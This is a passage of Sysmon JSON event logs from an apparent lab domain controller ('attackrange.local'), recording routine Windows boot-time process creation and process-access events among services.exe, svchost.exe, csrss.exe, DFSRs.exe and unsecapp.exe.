06:49:15.420","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"1244","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1247,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.421\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.421","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1248,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.370\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nProcessId: 2916\r\nImage: C:\\Windows\\System32\\dfsrs.exe\r\nFileVersion: 10.0.14393.2879 (rs1_release_inmarket.190313-1855)\r\nDescription: Distributed File System Replication\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: dfsr.exe\r\nCommandLine: C:\\Windows\\system32\\DFSRs.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=5043D2DBA1E5AC37A9874B403B48C1C1,SHA256=7044CE273B245F6D67A3BFC7D548CFF538F8FC3BD1C99467B5ADE6452C150313,IMPHASH=C1481566D7D03EEC4CC460B52429BA9C\r\nParentProcessGuid: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nParentProcessId: 852\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.370","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-001094C70200}","Image":"C:\\Windows\\System32\\dfsrs.exe","FileVersion":"10.0.14393.2879 (rs1_release_inmarket.190313-1855)","Description":"Distributed File System Replication","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"dfsr.exe","CommandLine":"C:\\Windows\\system32\\DFSRs.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=5043D2DBA1E5AC37A9874B403B48C1C1,SHA256=7044CE273B245F6D67A3BFC7D548CFF538F8FC3BD1C99467B5ADE6452C150313,IMPHASH=C1481566D7D03EEC4CC460B52429BA9C","ParentProcessGuid":"{E2A3D6B1-1058-5F25-0000-001030530000}","ParentProcessId":"852","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1249,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.432\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-0010E0D20200}\r\nProcessId: 3268\r\nImage: C:\\Windows\\System32\\wbem\\unsecapp.exe\r\nFileVersion: 10.0.14393.2515 (rs1_release_1.180830-1044)\r\nDescription: Sink to receive asynchronous callbacks for WMI client application\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: unsecapp.dll\r\nCommandLine: C:\\Windows\\system32\\wbem\\unsecapp.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=2E49BB6C9F6599F518FE30BE2F000247,SHA256=20F499D581CF4AF331D8EC8B1E07A32CC1A695EF6790B51DA5EE223C5867154F,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09\r\nParentProcessGuid: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nParentProcessId: 596\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.432","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010E0D20200}","Image":"C:\\Windows\\System32\\wbem\\unsecapp.exe","FileVersion":"10.0.14393.2515 (rs1_release_1.180830-1044)","Description":"Sink to receive asynchronous callbacks for WMI client application","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"unsecapp.dll","CommandLine":"C:\\Windows\\system32\\wbem\\unsecapp.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=2E49BB6C9F6599F518FE30BE2F000247,SHA256=20F499D581CF4AF331D8EC8B1E07A32CC1A695EF6790B51DA5EE223C5867154F,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09","ParentProcessGuid":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","ParentProcessId":"596","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1250,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.433\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 1180\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.433","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"1180","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1251,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.433\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010E0D20200}\r\nTargetProcessId: 3268\r\nTargetImage: C:\\Windows\\system32\\wbem\\unsecapp.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.433","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010E0D20200}","TargetProcessId":"3268","TargetImage":"C:\\Windows\\system32\\wbem\\unsecapp.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1252,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.433\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.433","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1253,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.433\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010E0D20200}\r\nTargetProcessId: 3268\r\nTargetImage: C:\\Windows\\system32\\wbem\\unsecapp.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.433","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010E0D20200}","TargetProcessId":"3268","TargetImage":"C:\\Windows\\system32\\wbem\\unsecapp.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1254,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.440\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010E0D20200}\r\nTargetProcessId: 3268\r\nTargetImage: C:\\Windows\\system32\\wbem\\unsecapp.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.440","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010E0D20200}","TargetProcessId":"3268","TargetImage":"C:\\Windows\\system32\\wbem\\unsecapp.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1255,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.447\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 1244\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.447","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"1244","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C: